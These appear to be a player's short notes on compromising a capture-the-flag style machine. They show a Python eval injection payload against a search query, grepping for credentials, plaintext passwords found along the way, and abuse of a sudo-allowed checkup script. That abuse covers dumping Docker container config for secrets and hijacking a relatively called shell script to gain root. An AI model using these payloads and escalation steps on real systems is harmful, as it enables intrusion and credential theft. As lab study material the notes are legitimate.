command injection on query due to eval

'+__import__('os').system("bla bla") )#

find password to cody via

grep -Ri cody

svc shares password

~~jh1usoih2bkjaspwe92~~

we have a sudo thing on the /opt/scripts/ script. theres a repo so maybe we find admin cred

find containers

sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps

CONTAINER ID   IMAGE                COMMAND                  CREATED        STATUS       PORTS                                             NAMES                                                                  
960873171e2e   gitea/gitea:latest   "/usr/bin/entrypoint…"   3 months ago   Up 3 hours   127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp   gitea            
f84a6b33fb5a   mysql:8              "docker-entrypoint.s…"   3 months ago   Up 3 hours   127.0.0.1:3306->3306/tcp, 33060/tcp               mysql_db

get envvars

sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .Config}}' "9608" | jq

administrator on gitea shares password yuiu1hoiu4i5ho1uh

now we can see what the scripts do

sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup calls ./full-checkup.sh so just hijack it with our own